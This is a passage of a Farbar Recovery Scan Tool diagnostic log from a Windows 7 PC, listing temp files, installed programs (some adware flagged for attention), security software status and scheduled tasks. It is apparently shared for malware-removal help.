2015-12-21 09:56 - 2014-10-18 16:33 - 00000000 ____D C:\Users\Charlie\Documents\Bluetooth Folder
2015-12-20 12:06 - 2014-11-16 23:26 - 00003946 _____ C:\Users\Charlie\AppData\Roaming\evpro32.prf
2015-12-18 07:54 - 2014-07-07 21:48 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2015-12-18 07:48 - 2014-10-18 19:53 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-16 18:27 - 2015-11-17 17:35 - 00003080 _____ C:\Windows\System32\Tasks\McAfeeLogon
2015-12-16 18:27 - 2014-08-05 20:26 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-16 18:24 - 2014-11-03 13:42 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-15 21:54 - 2014-10-27 21:48 - 00000000 ____D C:\Users\Charlie\Documents\BCHS
2015-12-13 08:14 - 2014-10-18 16:29 - 00000000 ____D C:\Users\Charlie\AppData\Local\Hewlett-Packard
 
==================== Files in the root of some directories =======
 
2014-11-16 23:26 - 2015-12-20 12:06 - 0003946 _____ () C:\Users\Charlie\AppData\Roaming\evpro32.prf
2014-10-18 19:36 - 2014-10-18 19:36 - 0000057 _____ () C:\ProgramData\Ament.ini
 
Some files in TEMP:
====================
C:\Users\Charlie\AppData\Local\Temp\COMAP.EXE
C:\Users\Charlie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmptas2yv.dll
C:\Users\Charlie\AppData\Local\Temp\Extract.exe
C:\Users\Charlie\AppData\Local\Temp\GURE7C7.exe
C:\Users\Charlie\AppData\Local\Temp\HPInstaller.exe
C:\Users\Charlie\AppData\Local\Temp\HPSFUpdater.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u45-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u60-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u65-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\McCSPInstall.dll
C:\Users\Charlie\AppData\Local\Temp\mccspuninstall.exe
C:\Users\Charlie\AppData\Local\Temp\OfficeSetup.exe
C:\Users\Charlie\AppData\Local\Temp\SMARTProductUpdate.exe
C:\Users\Charlie\AppData\Local\Temp\SP67266.exe
C:\Users\Charlie\AppData\Local\Temp\SP67743.exe
C:\Users\Charlie\AppData\Local\Temp\SP68630.exe
C:\Users\Charlie\AppData\Local\Temp\SP70271.exe
C:\Users\Charlie\AppData\Local\Temp\UninstallHPSA.exe
C:\Users\Charlie\AppData\Local\Temp\{3C54AF03-11C0-41B9-91DC-5F5B17899C60}-41.0.2272.118_41.0.2272.101_chrome_updater.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-01-09 01:47
 
==================== End of FRST.txt ============================
 
 
 
 
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:09-01-2015
Ran by Charlie (2016-01-10 12:44:00)
Running from C:\Users\Charlie\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-10-18 21:26:59)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1024156207-2972793060-2867319265-500 - Administrator - Disabled)
Charlie (S-1-5-21-1024156207-2972793060-2867319265-1000 - Administrator - Enabled) => C:\Users\Charlie
Guest (S-1-5-21-1024156207-2972793060-2867319265-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1024156207-2972793060-2867319265-1002 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version:  - )
Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.16 - Adobe Systems)
Adobe Digital Editions 4.0 (HKLM-x32\...\Adobe Digital Editions 4.0) (Version: 4.0.3 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CameraHelperMsi (x32 Version: 13.31.1038.0 - Logitech) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4102 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4113 - CyberLink Corp.)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)
Elevated Installer (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard)
ExamView ActiveX Control v2 (HKLM-x32\...\ExamView ActiveX Control v2) (Version:  - )
ExamView Assessment Suite (HKLM-x32\...\ExamView Pro) (Version:  - )
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FromDocToPDF Internet Explorer Toolbar  (HKLM-x32\...\FromDocToPDF_65bar Uninstall Internet Explorer) (Version:  - Mindspark Interactive Network) <==== ATTENTION
Fusion Browser 1.265.1 (HKLM\...\{84A45CC4-5BE9-4EA9-9AD5-EEEC9F534F0D}_is1) (Version: 1.265.1 - Fusion Media)
Garmin Express (HKLM-x32\...\{714dc1e5-69a4-4ecd-9552-93397e084298}) (Version: 3.2.29.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
GCPlugin2 (HKLM-x32\...\{30420F05-0E15-4A3B-AE73-9E39ABA6CF5E}) (Version: 2.0.2.10 - GradeCam)
Get-a-Clip (HKLM-x32\...\Get-a-Clip) (Version:  - Get-a-Clip)
Google Advertising Cookie Opt-out (HKLM\...\{A2E00B38-848D-4898-9109-BFA37C074DDC}) (Version: 1.0.1.0 - Google Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GradeCam Plugin x64 (HKLM\...\{EEA6A66F-FC11-436C-B01B-9D2EC1D62CA5}) (Version: 2.0.2.10 - GradeCam Corporation)
GradeCam Plugin x86 (HKLM-x32\...\{D776F9D4-581E-4BF2-880F-E4E6ACD2A002}) (Version: 2.0.2.10 - GradeCam Corporation)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{9AB1B6EC-AEA4-4D78-ADDB-0291BF7230F4}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{6BA7C52E-4071-47CC-9060-ABB143862DB0}) (Version: 3.0.7 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15430.4033 - Hewlett-Packard Company)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{DB97D0DE-0AA1-413C-8398-92C7FA3F4A67}) (Version: 4.6.13.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3621 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.4.40 - Intel Corporation)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
LessonView (HKLM-x32\...\LessonView) (Version:  - )
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
LWS VideoEffects (Version: 13.30.1379.0 - Logitech) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 14.0.6136 - McAfee, Inc.)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41105.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSN (HKLM-x32\...\MSNINST) (Version: 11.50.0766.0 - Microsoft Corporation)
MSN Explorer Repair Tool (HKLM-x32\...\{3D36105D-D6C2-413A-9355-7370E8D9125B}) (Version: 11.50.0766.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
One System Care (HKLM-x32\...\OneSystemCare) (Version: 2.10.10.0 - OneSystemCare) <==== ATTENTION
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Prentice Hall Physical Science Interactive Textbook CD-ROM (HKLM-x32\...\{DFBEBE31-6C56-4B5F-88C2-FF827AFFDBC5}) (Version: 1.00.0000 - Prentice Hall)
Presenter version 3.0.4.5 (HKLM-x32\...\{73E8CFA8-F031-40B1-9129-C1247D178DCD}_is1) (Version: 3.0.4.5 - IPEVO Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications)
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.49 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.85.423.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7231 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
ShopAtHome.com Helper (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Helper) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION
ShopAtHome.com Toolbar (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Toolbar) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION
SMART Common Files (HKLM-x32\...\{26A95DBF-A866-4838-A8C9-FA219FCBD22E}) (Version: 11.5.159.0 - SMART Technologies ULC)
SMART Ink (HKLM-x32\...\{5ABC49B5-D0DC-428D-A082-4AEFF6490F04}) (Version: 2.0.723.0 - SMART Technologies ULC)
SMART Notebook (HKLM-x32\...\{79660EE7-9C0B-4962-B566-2693FE34719D}) (Version: 11.4.564.0 - SMART Technologies ULC)
SMART Product Drivers (HKLM-x32\...\{53330A17-78DE-458E-9997-292A2D6D3ADD}) (Version: 11.4.872.1 - SMART Technologies ULC)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.16 - Synaptics Incorporated)
TeacherEXPRESS: Prentice Hall Physical Science (HKLM-x32\...\TeacherEXPRESS: Prentice Hall Physical Science) (Version:  - )
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Validity WBF DDK (HKLM\...\{21498212-1146-4540-8A81-6A1328BA19F2}) (Version: 4.5.228.0 - Validity Sensors, Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
Web Companion (HKLM-x32\...\{2db81dda-4a3a-409a-95ee-35f5f1366180}) (Version: 2.1.1265.2535 - Lavasoft)
Web Updater version 1.0.24.0 (HKLM\...\{E440E2C7-6EA3-46E1-8991-FB53C40AEF5F}_is1) (Version: 1.0.24.0 - Web Updater)
WildTangent Games App (HP Games) (x32 Version: 4.0.5.36 - WildTangent) Hidden
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{C6BDB9CB-5921-5A0D-ACED-D5F0EBCD92A1}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll (GradeCam Corporation)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {00532042-E325-4B5F-9A4B-C4BE2719C675} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)
Task: {093A13B7-EA87-43B1-9C8E-E79B05EF77EA} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {0C2051A4-532A-4C92-B62F-81876D901712} - System32\Tasks\Fusion Browser Update Task => Chrome.exe --sch-update
Task: {0DDEEAEA-10BF-4F5E-8430-AB9E61545ABE} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {1112A124-C075-4683-90F5-18FF6FDA9D4C} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)
Task: {15065424-9F51-4275-88A4-4E8B13E41D9D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {1694DD14-237E-4852-B696-048B86CC5641} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)
Task: {2375DDF3-B77A-4ED8-B269-3EFBDE46F0D9} - System32\Tasks\HP AR Program Upload - bc22bb12ee95412ea8674f2ec7d9856afd78dd59bb164814bed5e8212d68ac07 => C:\Program Files\HP\HP Officejet Pro 8600\bin\HPRewards.exe [2012-10-17] (TODO: <Company name>)
Task: {2B43043C-FEC8-40FD-997D-4CCC366C2781} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {2E9B0267-4BC2-4E0C-997E-CA602F06789B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2015-11-02] (McAfee, Inc.)
Task: {32BE05F2-95B0-4DB3-8FCB-70C777ECE174} - System32\Tasks\{9087FBD2-BE5A-4959-8427-E5A514D8FA8E} => pcalua.exe -a E:\Setup.exe -d E:\
Task: {33D0099D-EAA9-4CDF-B993-1E3E5B41D793} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2014-05-19] (Hewlett-Packard Development Company, L.P.)
Task: {40351BE5-BC97-494F-8470-20E8181B404D} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)
